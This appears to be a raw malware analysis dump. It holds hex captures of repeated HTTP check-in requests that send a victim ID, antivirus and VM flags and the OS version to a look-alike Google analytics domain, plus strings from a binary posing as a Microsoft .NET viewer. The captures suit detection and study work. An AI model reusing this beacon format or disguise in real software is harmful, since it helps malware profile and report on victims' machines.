0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6a 752f6647 7a645468 4d492048   abjju/fGzdThMI H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6b 2b535a4e 4d74494f 49682048   abjk+SZNMtIOIh H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6a 41776447 32755455 6f772048   abjjAwdG2uTUow H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4275356a 2b516470 636a2048   abjsBu5j+Qdpcj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a75 46485651 6f436442 75662048   abjuFHVQoCdBuf H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

Strings

edWP.rsrcVttceuritorla
\
.CC
 
.

040904B0
1s%P
2.0.50727.42
2.0.50727.42 (RTM.050727-4200)
bsJP2
Comments
CompanyName
credui.dll
&File
FileDescription
FileVersion
Flavor=Retail
                                 H
         (((((                  H
H|1%i
h&About ...
&Help
         h((((                  H
iE&xit
InternalName
Js2P
JSOPEN
KERNEL32.DLL
LegalCopyright
MAINICON
Microsoft
Microsoft Corporation
 Microsoft Corporation.  All rights reserved.
Microsoft .NET viewer
mscoree.dll
MS Shell Dlg
 .NET Framework
NETFXSBS10.exe
OriginalFilename
ProductName
ProductVersion
SCRIPTS
ssPP
StringFileInfo
Translation
{tw-
VarFileInfo
VS_VERSION_INFO
=(@"[@
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
03_nuj
0A@@Ju
:0^B$r
0/P4v4
0SSSSS
0xbkNE
'11899AA@KI
'11-899@@QGO
#''(-12..91-00
1@6,aF
((1-823908QKFB
18A@k>
$$(("-2...
 '-223
-'-23399
'2899AJA
#''(((-3.....
30AAj_
:::3$x
4BRsju
4%Fkep
.4sZL_3n6J
53	J@|
5BuyW|
5n]aaaa%
6~4e;~
\"}6;b
6>Mbbbbbb%
6=`qqqq4
6u^Mq%
6V"#c:
7~*67~#
7DaMMMMM%
7-#g3RMa?K
7^g[F8
7~nC7~
7,OdddddeydNc%
,]845I^
'889JJJjx
-'899AlG
'8@AJJJP
;[8"=j
'9AJjjj;
'9AJjjjm
'9AJkjjn
9M+,(w%
9t(g9o
[%9z`'
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
An application has made an attempt to load the C runtime library incorrectly.
apjH ?
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
A \z5C
,>bddd>
BeginPaint
Bigggggg
Biiiiiii
BoMbb%
bTYE=S^Q
bXb$Sg
$ceepq
cE(w6B
cgego4
CloseHandle
CorExitProcess
>cQjL)M
- CRT not initialized
d}23	i
@.data
d%}.c!Lw
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
D{!J(4:	
DOMAIN error
,( DxwT
&dyyyyy
)-/+@EC+
eeegeeeeeeeeeey
&Eggggggged
elB%sJ
EncodePointer
EndPaint
EnterCriticalSection
erbhn$.>
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
+Eyyyyy%
eyyyyyyeyyyyyyy
F{3M<A
fB{A!$J
F_ddd%
February
fEeeeeeee
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
Fogci9y
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
.FrMt\
]-#g3RMv
GDrqq)
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GF+v^:*
ggggggggggggggg<n
_gKhn"+
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
'Hl'I|L
Hlum^^^^=
HSQ}|{{tnUWUUWUUUUU=
I}AWjX	3
iB4J*P
i}b-jZ
~iFFI6
iiiiiiii
Ijc88]#x
InitializeCriticalSectionAndSpinCount
;INNNNNdNNd%
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
`J8%} 
JanFebMarAprMayJunJulAugSepOctNovDec
January
'@@JJjj}f
j@j ^V
jKns4%
jWy*tjq?
kernel32.dll
KERNEL32.dll
KKKKKKKK<
Kl_Jka@h5
K&{nC_
{kQ#}f
Kqwy(dhqx
*Ktuo]]]]=
l2OUfmB
LaElB,O
Last modified: Mayc
LCMapStringA
LCMapStringW
LeaveCriticalSection
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
LkGo9m
L|{o^^=
LoadLibraryA
LoadLibraryW
lstrcmpiA
Lttm[]]]]4
LuuR^^^^=
L}|v\]]=
M4\9h%cjM8
?Mccccccc%
MessageBoxA
Microsoft Visual C++ Runtime Library
mK/HRM>
mm____4
MM/dd/yy
:_MMMMMb%
mmpppp4
;MNNNNNNNN%
Monday
moTUTTTTTTUUT=
mQ1aPN
mRpppp4
MultiByteToWideChar
Mv!=r-I
Njmvvm
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ntdll.dll
=nUFPla
nX\\\\[=
nYZYYYY[=
o#6$;6@:
`OBB|M
October
"O$D9d
oftware). 
o)>IG4F
^)OKTIq
:oqcbb%
`OrA|M
p___^^^^>]>]]>]>]>]>=
p_bQl]
;pcNNdEI%
P/EyVk8R
Please contact the application's support team for more information.
PPPPPPPP
Program: 
<program name unknown>
pUOs2rH
- pure virtual function call
pwju?]{o
Q-ANeesL
qohqA=
:]qqqqq%
QueryPerformanceCounter
Q}|vU\\\\=
^qwf^hu
`.rdata
Rn````4
RR````4
RTaaaa4
RtlUnwind
runtime error 
Runtime Error!
RUXXWXXXXW=
Rv|,(Q
RVVVGGGFFF::CCC//
RVVVGGGGFFFFF::::CCCC/////<
R:wUlZIS
RXYYXYXXX=
R"(=zj
r	^zPY
s7~ls7~
Saturday
sd>W8"=
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
]Sgcz.
!'/SHG
ShowWindow
SING error
SIV )n
=SOFTu
SOFTWARE LICENSE AGREEMENT
\s'R_8m
strstr
s|u]^=
Sunday
SunMonTueWedThuFriSat
Svm____4
\t^]6:
;t99P/;
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
{T~Iqfb
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tn]]]]\4
~~to[\[\\\=
t"SS9]
,TTTTonmvuttuvmnTTTTTTTTTTTTTTTT=
t$<"u	3
Tuesday
;t$,v-
tvnXXYY[ZZY=
t+WWVPV
U2>VQ?
u$7X-t
uBh~(@
<um^^^^=
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
u{)'NL
UpdateWindow
UQPXY]Y[
URPQQh0Y@
USER32.dll
USER32.DLL
,[UTnv
UUULl|l
UUUTllv|g
UUUUUUUUUP
UUUUUUUUUUUUUUUUUUP
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUP
uUUUUUUUW
UUUUUUUUW
uUUUUUUW
UUUUUUUW
UUUUUUW
uUUUUUWwwwwwwwwwUUUU
uUUUUW
UUUUUW
UUUUUWw
uUUWwwwwUU
{uX]]]=
v0RI\n
v[\\\\\4
]V4WA<,
v/^IdX:
VirtualAlloc
VirtualFree
/vLxN.dS
vm^___=
vm1Mn'Y
:VMcccc%
v	N+D$
V!NKWzC
vQ}+t8
-W+]" 
Wednesday
Wf`J[*
WideCharToMultiByte
wj<o5C
WLMqgV
WriteFile
wUUUUUUUUUWwwwwwwwwwwwwwuUUUUU
x@*0FO
X7fo;<
|[?XB]N
xuUUUUUUUUW
Yc,j]	R
Y<G6yQ
yGp?jy
YMz</[1
YO!\d$
>=Yt1j
yyyyyy
z1Rich
!zA#=i
z	RP(OE
zWnFc)-
zz;=H8
|{zzzzzz{|tmoTTTTTTTTTTTTT=